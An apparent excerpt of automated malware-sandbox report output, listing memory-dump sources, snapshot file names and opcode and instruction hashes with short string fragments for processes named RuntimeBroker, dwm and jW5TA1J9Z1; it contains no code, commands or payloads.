                                                                      • Opcode Fuzzy Hash: 8cbe65a97567c115e1146222241288e30c5ef19554915f3a78f7edfbfb2451e3
                                                                      • Instruction Fuzzy Hash: CB412C3264C9159FD714FB6CE4889F87BE0EF8632170544BBD08ACB163DA10AC8183C1
                                                                      Memory Dump Source
                                                                      • Source File: 00000025.00000002.2141073606.00007FFAAB440000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB440000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_37_2_7ffaab440000_jW5TA1J9Z1.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: dd6051d6d8f48cdb4b5735b658963eab3887c0e7664b1c64fb692fc812c4903b
                                                                      • Instruction ID: 0c3c52f8c346fc9a2a080fdb6f5de589be1b6e46bc8f845eda7990e35e116c30
                                                                      • Opcode Fuzzy Hash: dd6051d6d8f48cdb4b5735b658963eab3887c0e7664b1c64fb692fc812c4903b
                                                                      • Instruction Fuzzy Hash: A6412763A4E6966FE714B3BCE09A9F87BD0EF85365B1444FBD04EC71A3CD18688182C5
                                                                      Memory Dump Source
                                                                      • Source File: 00000025.00000002.2141073606.00007FFAAB440000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB440000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_37_2_7ffaab440000_jW5TA1J9Z1.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: ab543eec825e551e424fc697a87382d72f6f23c06d3d921f6875dc3af3a8d241
                                                                      • Instruction ID: e82eb753ab908938fdc7d99487929c27d36fb6e28d6aad92b18def5d067dec58
                                                                      • Opcode Fuzzy Hash: ab543eec825e551e424fc697a87382d72f6f23c06d3d921f6875dc3af3a8d241
                                                                      • Instruction Fuzzy Hash: F0414B60A1EA899FE788F738C459AB57BD1EF9A350B1440BDE40EC33E3DD18AC558385
                                                                      Memory Dump Source
                                                                      • Source File: 00000025.00000002.2141073606.00007FFAAB440000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB440000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_37_2_7ffaab440000_jW5TA1J9Z1.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 0cc6d291224cff623f15b76e085ee268e028e3e3f7966c47599f22330fc3e73a
                                                                      • Instruction ID: 713c8b5414808e1ca5e637a988efc28f32dc33321c35014708da64902c1609a9
                                                                      • Opcode Fuzzy Hash: 0cc6d291224cff623f15b76e085ee268e028e3e3f7966c47599f22330fc3e73a
                                                                      • Instruction Fuzzy Hash: 4721D53130D8184FE768EB0CE889DB973D1FB5A32170101BAE58EC7136E911EC9287C1
                                                                      Memory Dump Source
                                                                      • Source File: 00000025.00000002.2141073606.00007FFAAB440000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB440000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_37_2_7ffaab440000_jW5TA1J9Z1.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 48f7d3349f237d0cd259050161c7cd12cbc1f8481fe16f36fa7be5e052e18ae5
                                                                      • Instruction ID: 8dc1a4b53240b32075e3f6418f8cad7a3fc359ad7faf370abf3d7255b91f093c
                                                                      • Opcode Fuzzy Hash: 48f7d3349f237d0cd259050161c7cd12cbc1f8481fe16f36fa7be5e052e18ae5
                                                                      • Instruction Fuzzy Hash: F8312662A0EA566FF358B37CE44A9F877D1EF85361B1444BAD00FC32A3CC186C814284
                                                                      Memory Dump Source
                                                                      • Source File: 00000025.00000002.2141073606.00007FFAAB440000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB440000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_37_2_7ffaab440000_jW5TA1J9Z1.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 5cc3a902f9309245da6a096720bf0bcf346abfae0e55ee3c01761571449c6c81
                                                                      • Instruction ID: 2aa688cce33b665c6fbd6960765cd51d5119b6a9814b48f8887eed6a70f167e8
                                                                      • Opcode Fuzzy Hash: 5cc3a902f9309245da6a096720bf0bcf346abfae0e55ee3c01761571449c6c81
                                                                      • Instruction Fuzzy Hash: AD31E67190DA4A8FDB45EB68C8559F97FF0FF5A310B0445BAC00EC71A2DA29A455C781
                                                                      Memory Dump Source
                                                                      • Source File: 00000025.00000002.2141073606.00007FFAAB440000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB440000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_37_2_7ffaab440000_jW5TA1J9Z1.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: b7ab4e89eb648e421fc68a98013d16c83568118fe69ab67404afbb9e9efb0955
                                                                      • Instruction ID: fe0b2811f650fba7bd05e9ab2478d551debd32a497bb1dcb6d57b4401140dd71
                                                                      • Opcode Fuzzy Hash: b7ab4e89eb648e421fc68a98013d16c83568118fe69ab67404afbb9e9efb0955
                                                                      • Instruction Fuzzy Hash: C6312476A0D64ADFE302AB78D4042EC7FB0EF82351F0485B6D04DCA2D3D93829A987C1
                                                                      Memory Dump Source
                                                                      • Source File: 00000025.00000002.2141073606.00007FFAAB471000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB471000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_37_2_7ffaab471000_jW5TA1J9Z1.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 9ddf3e0319d792d087a489c33ef01340538805b894fe7b514d237814a4fc9d1b
                                                                      • Instruction ID: acf8c37972bb2198ae0add632ef94403b8ce6bb8326e44875260aa4b4107c141
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000025.00000002.2141073606.00007FFAAB440000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB440000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_37_2_7ffaab440000_jW5TA1J9Z1.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: c9$!k9$"s9$#{9
                                                                      • API String ID: 0-1692736845
                                                                      • Opcode ID: d51d87f4bf8dc3cd4ccfdd7a9390f68007acb6a097157c88452ed5e5a7d49aa0
                                                                      • Instruction ID: 0e1940acc0a3f8b1bc9895f3ce5b0a10781f4cda516efab16a0242bd87582379
                                                                      • Opcode Fuzzy Hash: d51d87f4bf8dc3cd4ccfdd7a9390f68007acb6a097157c88452ed5e5a7d49aa0
                                                                      • Instruction Fuzzy Hash: 9951F58FB4956376E21133BDF0099EC5BE8EFD1376B094AB7D14EC91834D08689982E5
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000026.00000002.2223394236.00007FFAAB460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB460000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_38_2_7ffaab460000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 63$0#=$0#=$0#=$0#=$p[5$p[5
                                                                      • API String ID: 0-2821616782
                                                                      • Opcode ID: 92a3060c72fcf4e98653d36ac548c8b66414bc527f2956677016e2cf022ede07
                                                                      • Instruction ID: 3a8be5ff0c6d424ed9300111b61660ab28b72ad92f41f41eda382b3373bc4926
                                                                      • Opcode Fuzzy Hash: 92a3060c72fcf4e98653d36ac548c8b66414bc527f2956677016e2cf022ede07
                                                                      • Instruction Fuzzy Hash: 1982A771A1D95A8FEB98EB28C465AB8B7E2FF95340F1445B9D00EC3293DD34AC4687C1
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000026.00000002.2223394236.00007FFAAB450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB450000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_38_2_7ffaab450000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: "93$5Z_H$b43$r63$r63
                                                                      • API String ID: 0-999556193
                                                                      • Opcode ID: ee2d4fde4ead3ea0fe0f7e46c1bfb864b69262723d3025692c339b55f51684ae
                                                                      • Instruction ID: 0eeffe6b3ef07266458dd920dc48d518a0c21ae49f0087f577446fd0fd447a27
                                                                      • Opcode Fuzzy Hash: ee2d4fde4ead3ea0fe0f7e46c1bfb864b69262723d3025692c339b55f51684ae
                                                                      • Instruction Fuzzy Hash: AF911BB6A19A998FE748DB68C865BADBFE1FB56350F4041BEC04DC73D6CA741804C780
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000026.00000002.2223394236.00007FFAAB481000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB481000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_38_2_7ffaab481000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: I$r63
                                                                      • API String ID: 0-3249758050
                                                                      • Opcode ID: 8762998300360134a885f2f4615219e8229c6ffaabff16e140131fae6fa297bc
                                                                      • Instruction ID: 8b2a2a7c08d6df3c350e586c8d5466fd3b456b86f32b43aa8aa9b102601158ea
                                                                      • Opcode Fuzzy Hash: 8762998300360134a885f2f4615219e8229c6ffaabff16e140131fae6fa297bc
                                                                      • Instruction Fuzzy Hash: D6D19D6191D6964BE31D47694C420B57BD2EF9B281B18C2BED9EFC70A7D918E80B82C1
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000026.00000002.2223394236.00007FFAAB481000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB481000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_38_2_7ffaab481000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: r63
                                                                      • API String ID: 0-1294201789
                                                                      • Opcode ID: a79160f42891ce8cfe7a66720d6530c9010cc9e533366bbf03073532d396bdac
                                                                      • Instruction ID: 7ea51bd93b25ca83bd7e6d5aee09731e723da9228c7f19f69c7134fdfd6d1010
                                                                      • Opcode Fuzzy Hash: a79160f42891ce8cfe7a66720d6530c9010cc9e533366bbf03073532d396bdac
                                                                      • Instruction Fuzzy Hash: A2816962E1D65647E31C4A6D4C420B277D6EBCB295B18C27EDDEFC7197D818E80B42C1
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000026.00000002.2223394236.00007FFAAB481000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB481000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_38_2_7ffaab481000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: r63
                                                                      • API String ID: 0-1294201789
                                                                      • Opcode ID: 289f7ab05839d315bdf69f89a319b8cb6e3ed8bc46ed0277736787f6f686d241
                                                                      • Instruction ID: 2945eb3fbd7778687ffcda0fb644c4ea0c0d1ec4aef0295ad1042d4c2fb7d9f6
                                                                      • Opcode Fuzzy Hash: 289f7ab05839d315bdf69f89a319b8cb6e3ed8bc46ed0277736787f6f686d241
                                                                      • Instruction Fuzzy Hash: 26419431A0C91ACFEB58E798C451BB877A2FBA9350F0542B9D01ED72D6CE286C4987C1
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000026.00000002.2223394236.00007FFAAB481000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB481000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_38_2_7ffaab481000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 63
                                                                      • API String ID: 0-3819469774
                                                                      • Opcode ID: cc8826f5d92ee687ceaccdb623a758b592c177df003bdb149565f82e7f406cd8
                                                                      • Instruction ID: c92f5a6b4f57bf4b923ad0620c610ca75563f31ed948fb5cf24ba7a2abe9c107
                                                                      • Opcode Fuzzy Hash: cc8826f5d92ee687ceaccdb623a758b592c177df003bdb149565f82e7f406cd8
                                                                      • Instruction Fuzzy Hash: DD214CB2A199598FE798EB68C856AF8B3E1FFA9341F4085F5D04DC3192CD346D858B80
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000026.00000002.2223394236.00007FFAAB481000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB481000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_38_2_7ffaab481000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 8e=
                                                                      • API String ID: 0-1240725123
                                                                      • Opcode ID: c9d974e27934447977b2f7525640126fe863441ce8873503cd8c85f766359c83
                                                                      • Instruction ID: 524bd60320f761e896e3024d880a22a527e314ae60f98fd06e75f71417300351
                                                                      • Opcode Fuzzy Hash: c9d974e27934447977b2f7525640126fe863441ce8873503cd8c85f766359c83
                                                                      • Instruction Fuzzy Hash: 0101F732F0981A8BEB54E7A8D4457FD73E2EF94351F00857AD21DD3180DE38A9948BC0
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000026.00000002.2223394236.00007FFAAB481000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB481000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_38_2_7ffaab481000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: M
                                                                      • API String ID: 0-3664761504
                                                                      • Opcode ID: f284d4d64135dd8af87f26ca75c30793508fc92f1c08ccd5c5302e21286a8fb7
                                                                      • Instruction ID: ef584b4bd0f9a2371cb140f86be975e99477a4d177fc4e8d67ba3617aadb8806
                                                                      • Opcode Fuzzy Hash: f284d4d64135dd8af87f26ca75c30793508fc92f1c08ccd5c5302e21286a8fb7
                                                                      • Instruction Fuzzy Hash: E5F0E56150E7C04FD71A9A3888698517F60EF2720134A41EFC045CF1E3DA1DCC88C752
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000026.00000002.2223394236.00007FFAAB481000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB481000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_38_2_7ffaab481000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: M
                                                                      • API String ID: 0-3664761504
                                                                      • Opcode ID: b6683c5746c04d043220b83a23ab60948d3f58f10f4edc2b3c410b9af7fb045d
                                                                      • Instruction ID: e0799a57bffe279d3bb1c8d2dba211982506b9a8211fa688546437b309e05282
                                                                      • Opcode Fuzzy Hash: b6683c5746c04d043220b83a23ab60948d3f58f10f4edc2b3c410b9af7fb045d
                                                                      • Instruction Fuzzy Hash: 40E0657150A7C48FD719A67888698657FA0EF6720174951EEC045CF1A3EA1D8885C751
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000026.00000002.2223394236.00007FFAAB481000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB481000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_38_2_7ffaab481000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: M
                                                                      • API String ID: 0-3664761504
                                                                      • Opcode ID: 8ff665bf502cb4e09bd759d1e6cf2d21b2c7702e1d34fe1e111012075151ae5c
                                                                      • Instruction ID: 7d3e241e690c04e08218fcb51fda55da4c8b1307b9aef79e5ec1253b9e08a7d1
                                                                      • Opcode Fuzzy Hash: 8ff665bf502cb4e09bd759d1e6cf2d21b2c7702e1d34fe1e111012075151ae5c
                                                                      • Instruction Fuzzy Hash: 0DF0E57090E3C48FC71ADB348829414BFA0EF6720134A45EFC045CF1A3EA2D8888CB01
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000026.00000002.2223394236.00007FFAAB481000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB481000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_38_2_7ffaab481000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: M
                                                                      • API String ID: 0-3664761504
                                                                      • Opcode ID: 74e794c314814809519a8e7333b88356f68b5256d7c3304fb3a1344d98d9690c
                                                                      • Instruction ID: 9bbabbd86bf3a29aa04a346187c22bf329de78387174c6b7f3a577c7176c81db
                                                                      • Opcode Fuzzy Hash: 74e794c314814809519a8e7333b88356f68b5256d7c3304fb3a1344d98d9690c
                                                                      • Instruction Fuzzy Hash: E5F0E571A0A3C04FCB15DB3884A44547F60EF6720074941EEC045CF1E7DA2CD84AC700
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000026.00000002.2223394236.00007FFAAB481000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB481000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_38_2_7ffaab481000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: I
                                                                      • API String ID: 0-3707901625
                                                                      • Opcode ID: 814c28cfa10c4e1c0bac6d60e13170ad899c77c0c9af17574073379e4b8755c6
                                                                      • Instruction ID: bf0dc71b756ad3866bde4f70ed551769ffe9311e09ac155b67902bfb345e3eff
                                                                      • Opcode Fuzzy Hash: 814c28cfa10c4e1c0bac6d60e13170ad899c77c0c9af17574073379e4b8755c6
                                                                      • Instruction Fuzzy Hash: 6DE0926144A3C04FC705AB7888658543FA0DE2B21178A40DEC045CF0B3D21E8849C712
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000026.00000002.2223394236.00007FFAAB481000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB481000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_38_2_7ffaab481000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: I
                                                                      • API String ID: 0-3707901625
                                                                      • Opcode ID: 48e351cd30abb9e7705ea2c6b7225721b9ac860f60cb64ea75d1835c1353f2a9
                                                                      • Instruction ID: ee824d2981d9c9ff3989126930468c8127fb7e9e7630e69a31de1b07a6ef572b
                                                                      • Opcode Fuzzy Hash: 48e351cd30abb9e7705ea2c6b7225721b9ac860f60cb64ea75d1835c1353f2a9
                                                                      • Instruction Fuzzy Hash: 1DE01A7144F7C04FCB4AEB7488698547FA1AE6721178A41EEC049CF1B3E62E8849C701
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000026.00000002.2223394236.00007FFAAB481000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB481000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_38_2_7ffaab481000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: I
                                                                      • API String ID: 0-3707901625
                                                                      • Opcode ID: adc2a2869d49417c7d2c3a4e5b93ea41a0ca96cd0f47f5c84ce626e47fe5c379
                                                                      • Instruction ID: 3529e2c3aa8f7f7a5f0cfd465985b311be178d32710ee6d3fc3b8c3a534c07cd
                                                                      • Opcode Fuzzy Hash: adc2a2869d49417c7d2c3a4e5b93ea41a0ca96cd0f47f5c84ce626e47fe5c379
                                                                      • Instruction Fuzzy Hash: ABE01A7144F7C08FCB4AEB74886A8547FB1AE6721078A40EEC089CF1B3E62E8849C701
                                                                      Memory Dump Source
                                                                      • Source File: 00000026.00000002.2223394236.00007FFAAB450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB450000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_38_2_7ffaab450000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 96eaaab7907db59c5e9c261e54b015b41a90df8e5c9c15836d384e321062bb8c
                                                                      • Instruction ID: b870b6bc90a23b9add67cbd2ca7872be046cab6a3111a16cd423a2fb10a2e75b
                                                                      • Opcode Fuzzy Hash: 96eaaab7907db59c5e9c261e54b015b41a90df8e5c9c15836d384e321062bb8c
                                                                      • Instruction Fuzzy Hash: 0A412F3264CA648FD714FBACE4889F97BE0EF8632170549BBD08ACB063D910AC8183C1
                                                                      Memory Dump Source
                                                                      • Source File: 00000026.00000002.2223394236.00007FFAAB450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB450000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_38_2_7ffaab450000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 617b499b883f529f54e22c9200771b0445154e1a1e95bd444f6b999d69d5ca48
                                                                      • Instruction ID: ec7da4f02fffaa736ace9113d8f6779e155bb1694b6589b44300ec01165b939f
                                                                      • Opcode Fuzzy Hash: 617b499b883f529f54e22c9200771b0445154e1a1e95bd444f6b999d69d5ca48
                                                                      • Instruction Fuzzy Hash: A3411553A4EA956FE314B37CE05A9F97BD0DF86261B0449FED08EC61A3CD086C818281
                                                                      Memory Dump Source
                                                                      • Source File: 00000026.00000002.2223394236.00007FFAAB450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB450000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_38_2_7ffaab450000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 0cc6d291224cff623f15b76e085ee268e028e3e3f7966c47599f22330fc3e73a
                                                                      • Instruction ID: faf4efb2ab944e200b9afe7d364de4d2c9b83e7877de95e667fe599b5e5e9f02
                                                                      • Opcode Fuzzy Hash: 0cc6d291224cff623f15b76e085ee268e028e3e3f7966c47599f22330fc3e73a
                                                                      • Instruction Fuzzy Hash: F121D53130DC184FE768EB0CE889DB973D1EB5A32170101BAE58EC7136E911EC8287C1
                                                                      Memory Dump Source
                                                                      • Source File: 00000026.00000002.2223394236.00007FFAAB450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB450000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_38_2_7ffaab450000_RuntimeBroker.jbxd
                                                                      Memory Dump Source
                                                                      • Source File: 00000026.00000002.2223394236.00007FFAAB481000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB481000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_38_2_7ffaab481000_RuntimeBroker.jbxd
                                                                      Memory Dump Source
                                                                      • Source File: 00000026.00000002.2223394236.00007FFAAB460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB460000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_38_2_7ffaab460000_RuntimeBroker.jbxd
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000026.00000002.2223394236.00007FFAAB450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB450000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_38_2_7ffaab450000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: c9$!k9$"s9$#{9
                                                                      • API String ID: 0-1692736845
                                                                      • Opcode ID: 69e90d77f452adf29e7fc8c0cf89335f429999deb88ddb0da52c7696247e7b91
                                                                      • Instruction ID: 0f0e3c153b92b32ef7d5cbdf679a1fda690449e09e499981e4237834940c595d
                                                                      • Opcode Fuzzy Hash: 69e90d77f452adf29e7fc8c0cf89335f429999deb88ddb0da52c7696247e7b91
                                                                      • Instruction Fuzzy Hash: 2E51B34FB4956276E21133FCF4099ED5BE8EFD5276B094ABBD14EC91834C086C8583E5
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000027.00000002.2305390461.00007FFAAB440000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB440000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_39_2_7ffaab440000_dwm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: "93$5[_H$b43$r63$r63
                                                                      • API String ID: 0-3569791616
                                                                      • Opcode ID: cea0293ab9988eb4f80581bee14c2f3473b6f3b0639a08c4ef9b3921700ec4b2
                                                                      • Instruction ID: 903a6407bba7e1d4954bbaf0c028044c04b5c2a114c3b746e45323009d841148
                                                                      • Opcode Fuzzy Hash: cea0293ab9988eb4f80581bee14c2f3473b6f3b0639a08c4ef9b3921700ec4b2
                                                                      • Instruction Fuzzy Hash: 8091F9B6A08A898FE749DB68C8657A97FE1FB96350F4444BBC04DC73E2CB781424C740
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000027.00000002.2305390461.00007FFAAB471000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB471000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_39_2_7ffaab471000_dwm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: r63
                                                                      • API String ID: 0-1294201789
                                                                      • Opcode ID: 6abf19f814f71fcabdd82a3ea9829dbfbe4266bd13e943dbbf11428034c66232
                                                                      • Instruction ID: f6fbe168ce19d33a46f464d40bcef0c247b3953ae2cd9eb48b156ba579f5901f
                                                                      • Opcode Fuzzy Hash: 6abf19f814f71fcabdd82a3ea9829dbfbe4266bd13e943dbbf11428034c66232
                                                                      • Instruction Fuzzy Hash: BEC1CD62A2D6964BE31D4B284C860B577D6EBD3241B18C27DD8DFC7097F928E84BC2C1
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000027.00000002.2305390461.00007FFAAB471000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB471000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_39_2_7ffaab471000_dwm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: r63
                                                                      • API String ID: 0-1294201789
                                                                      • Opcode ID: a07aaf050c2e93f97fccf936461b408d3c81567e1a6f0ddef4601b595b3f28f9
                                                                      • Instruction ID: fbb2286ad5fcfca1d69db3ac445aa2e548bf9e14742b24a918e39c80d778e424
                                                                      • Opcode Fuzzy Hash: a07aaf050c2e93f97fccf936461b408d3c81567e1a6f0ddef4601b595b3f28f9
                                                                      • Instruction Fuzzy Hash: 1E41A732A08919CFDB58E758C495BB877A2FB9A350F0582B9D00DD72D6CE346C89C7C1
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000027.00000002.2305390461.00007FFAAB471000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB471000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_39_2_7ffaab471000_dwm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 63
                                                                      • API String ID: 0-3819469774
                                                                      • Opcode ID: 895d6f01b06057cad1b2fd9b537a5b2c6c8060dfe139118ff0d83fa651ad5630
                                                                      • Instruction ID: 53fff9d696a3ccc5c0167571fb9305296d068850483e249d718b22f62ff702f2
                                                                      • Opcode Fuzzy Hash: 895d6f01b06057cad1b2fd9b537a5b2c6c8060dfe139118ff0d83fa651ad5630
                                                                      • Instruction Fuzzy Hash: 52214F71A199598FE798EB28C8566F8B3A1FFA9340F5085F5D04DC3192CD346DC58B80
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000027.00000002.2305390461.00007FFAAB471000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB471000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_39_2_7ffaab471000_dwm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 8e=
                                                                      • API String ID: 0-1240725123
                                                                      • Opcode ID: 7325bc257dd90cb28d9d2f0140cb7293e82906273ace0fb0d96613e92bb14dcf
                                                                      • Instruction ID: 359466f498cc4d118050f5dd5a3c586a2365977e1abe7764f621a0fe01bc9cb7
                                                                      • Opcode Fuzzy Hash: 7325bc257dd90cb28d9d2f0140cb7293e82906273ace0fb0d96613e92bb14dcf
                                                                      • Instruction Fuzzy Hash: CF01BC72F1881A8BEB94EA28D4457BD73E1EFD4351F008576D00ED7180DE28A9D8CBC0
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000027.00000002.2305390461.00007FFAAB471000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB471000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_39_2_7ffaab471000_dwm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: M
                                                                      • API String ID: 0-3664761504
